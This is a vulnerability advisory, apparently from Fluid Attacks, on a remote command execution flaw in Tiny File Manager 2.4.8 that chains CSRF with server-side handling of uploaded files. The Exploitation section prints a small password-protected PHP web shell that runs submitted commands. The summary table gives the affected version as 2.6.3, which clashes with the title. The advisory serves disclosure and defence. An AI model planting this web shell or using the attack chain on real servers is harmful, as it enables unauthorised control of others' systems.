---
slug: advisories/mosey/
title: Tiny File Manager 2.4.8 - Remote Command Execution
authors: Carlos Bello
writer: cbello
codename: mosey
product: Tiny File Manager 2.4.8 - RCE
date: 2022-11-21 14:00 COT
cveid: CVE-2022-23044,CVE-2022-45475,CVE-2022-45476
severity: 10.0
description: Tiny File Manager 2.4.8    -    Remote Command Execution (RCE)
keywords: Fluid Attacks, Security, Vulnerabilities, Tiny File Manager, RCE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Tiny File Manager 2.4.8 - RCE"
    code="[Mosey](https://en.wikipedia.org/wiki/Lil_Mosey)"
    product="Tiny File Manager "
    affected-versions="Version 2.6.3"
    fixed-versions=""
    state="Public"
    release="2022-11-21">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Remote command execution"
    rule="[004. Remote command execution](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-004)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
    score="10.0"
    available="Yes"
    id="[CVE-2022-23044](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23044),
    [CVE-2022-45475](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45475),
    [CVE-2022-45476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45476)">
</vulnerability-table>

## Description

Version 2.4.8 of Tiny File Manager allows an unauthenticated remote
attacker to execute arbitrary code remotely on the server. This is
possible because the application is vulnerable to CSRF, processes
uploaded files server-side (instead of just returning them for
download), and allows unauthenticated users to access uploaded files.

## Vulnerability

This vulnerability occurs because the application is vulnerable to CSRF,
processes uploaded files server-side (instead of just returning them for
download), and allows unauthenticated users to access uploaded files.

## Exploitation

To exploit this vulnerability, the following file must be sent to the server
as administrator (to achieve this I will abuse the CSRF present in the application).

### exploit.php

```php
<?php
    if($_POST && $_POST['password']==="AGSH635479302H235") {
        echo system($_POST['cmd']);
    }
?>
```

## Evidence of exploitation

![RCE-FIleManager](https://user-images.githubusercontent.com/51862990/202495758-36ca856f-19fb-4cc9-996a-d8e6000e633f.gif)

![RCE-FileManager](https://user-images.githubusercontent.com/51862990/202495810-5201db03-3c1b-4937-b252-49bbc6b62cff.png)

## Our security policy

We have reserved the CVE-2022-23044, the CVE-2022-45475, the CVE-2022-45476 to refer
to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Tiny File Manager 2.4.8

* Operating System: GNU/Linux

## Mitigation

An updated version of Tiny File Manager is available at the vendor page.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/prasathmani/tinyfilemanager>

**Release page** <https://github.com/prasathmani/tinyfilemanager/releases/tag/2.5.0>

## Timeline

<time-lapse
  discovered="2022-11-17"
  contacted="2022-11-17"
  replied="2022-11-17"
  confirmed="2022-11-17"
  patched=""
  disclosure="2022-11-21">
</time-lapse>
